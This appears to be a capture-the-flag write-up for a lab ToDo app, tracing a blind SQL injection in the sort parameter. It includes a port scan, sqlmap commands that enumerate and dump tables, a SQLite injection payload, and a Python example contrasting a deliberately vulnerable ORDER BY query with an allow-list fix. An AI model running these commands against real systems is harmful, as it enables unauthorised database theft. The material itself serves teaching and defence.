Initial Recon
We will use rustscan for port discovery.
rustscan -a TARGET_IP -- -A -sC
The output should look like the following:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bc7ecc46211d6323652a21383e418c70 (RSA)
| 256 ea203ed1c491e879ef2d339bf11caf10 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHGWPtvoLcSuiPd+wNAPJ0qq3EEUNg8064D1mn6y6gEShvcHKz+xLg6p3ZgfDZvtYOwtbZ5sn7StlwpFExuJiCE=
| 256 c998ec9871424589e1222a32c4d2c01d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXA8smlcww1+5QTpnojr12eGZDWr//L/ghypXrbf17Z
80/tcp open rtsp syn-ack
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
|_http-title: Prioritise
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Content-Length: 2756
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <meta
| name="viewport"
| content="width=device-width, initial-scale=1, shrink-to-fit=no"
| <link
| rel="stylesheet"
| href="../static/css/bootstrap.min.css"
| crossorigin="anonymous"
| <link
| rel="stylesheet"
| href="../static/css/font-awesome.min.css"
| crossorigin="anonymous"
| <link
| rel="stylesheet"
| href="../static/css/bootstrap-datepicker.min.css"
| crossorigin="anonymous"
| <title>Prioritise</title>
| </head>
| <body>
| <!-- Navigation -->
| <nav class="navbar navbar-expand-md navbar-dark bg-dark">
| <div class="container">
| class="navbar-brand" href="/"><span class="">Prioritise</span></a>
| <button
| class="na
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, HEAD, GET
| Content-Length: 0
| RTSPRequest:
| RTSP/1.0 200 OK
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, HEAD, GET
|_ Content-Length: 0
Apart from SSH, there is only a single HTTP server running a ToDo application (nmap labels port 80 as rtsp, but the fingerprint strings show ordinary HTTP responses). Nothing else of interest here.
Let's head over to the ToDo app!
Let's add a few items to the list.
As you can see, I tried an XSS payload and a SQL injection payload, but there was no success.
Let's use the Sort option in the application.
This is a likely injection point: the sort column is sent as a plain GET parameter (order=date), which is easy to test.
We can now use SQLMap to do the job.
Attack Phase
Firing up SQLMap
sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3
We are using SQLMap because this is a blind SQL injection: the page only reveals one bit per request (did the condition hold or not), and extracting data manually that way takes a very long time.
After some time, sqlmap finds a working payload:
[22:19:06] [INFO] checking if the injection point on GET parameter 'order' is a false positive
GET parameter 'order' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 807 HTTP(s) requests:
---
Parameter: order (GET)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: order=date AND CASE WHEN 3835=3835 THEN 3835 ELSE JSON(CHAR(88,99,121,110)) END
---
[22:19:14] [INFO] the back-end DBMS is SQLite
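The payload above only works because the sort key ends up inside the ORDER BY clause as raw SQL. The following added example (not code from the room or the original write-up) shows that pattern beside a hardened version; the `todos` table name is from the sqlmap output, while the `title` and `date` columns and the sample rows are constructed assumptions.

```python
import sqlite3


# Constructed in-memory stand-in for the ToDo app's SQLite database. The
# table name `todos` is from the sqlmap output; the columns are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE todos (id INTEGER PRIMARY KEY, title TEXT, date TEXT)")
    conn.executemany(
        "INSERT INTO todos (title, date) VALUES (?, ?)",
        [("buy milk", "2023-02-03"), ("write report", "2023-01-15"), ("call bob", "2023-03-01")],
    )
    return conn


def list_todos_vulnerable(conn, order):
    # Vulnerable pattern: the `order` query parameter is pasted into the
    # ORDER BY clause, so any SQL expression is accepted. A boolean-based
    # blind payload of the shape sqlmap found (`date AND CASE WHEN ... END`)
    # runs unchanged, and the row order or an error leaks one bit per request.
    query = f"SELECT title FROM todos ORDER BY {order}"
    return [row[0] for row in conn.execute(query)]


# Hardened pattern: ORDER BY cannot take a bound parameter (`?`), so the sort
# key is mapped through a fixed allow-list of column names instead.
ALLOWED_ORDER = {"date": "date", "title": "title"}


def list_todos_safe(conn, order):
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError(f"unsupported sort key: {order!r}")
    return [row[0] for row in conn.execute(f"SELECT title FROM todos ORDER BY {column}")]


def accepts_injected_expression(conn, fn, order):
    # True if `fn` executes an attacker-controlled sort key without rejecting
    # it, False if the key is rejected or the query fails.
    try:
        fn(conn, order)
        return True
    except (ValueError, sqlite3.Error):
        return False


if __name__ == "__main__":
    db = make_db()
    # Shape of the sqlmap payload above with the JSON() error trigger
    # replaced by a harmless constant.
    probe = "date AND CASE WHEN 1=1 THEN 1 ELSE 0 END"
    print("vulnerable accepts probe:", accepts_injected_expression(db, list_todos_vulnerable, probe))
    print("hardened accepts probe:  ", accepts_injected_expression(db, list_todos_safe, probe))
```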
Let's enumerate the tables now. Since this is a blind SQL injection, every character costs several requests, so we add threads to speed the process up.
sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 --tables --threads 10
[2 tables]
+-------+
| flag |
| todos |
+-------+
Now we can dump the flag table with the following command:
sqlmap -u http://TARGET_IP/\?order\=date --risk 3 --level 3 -T flag --threads 10 --dump
We now have the flag!
[22:22:51] [INFO] retrieved: 38
[22:23:04] [INFO] retrieved: flag{65f2f8cfd53d59422f3_REDACTED}
Database: <current>
Table: flag
[1 entry]
+----------------------------------------+
| flag |
+----------------------------------------+
| flag{65f2f8cfd53d59422f3_REDACTED} |
+----------------------------------------+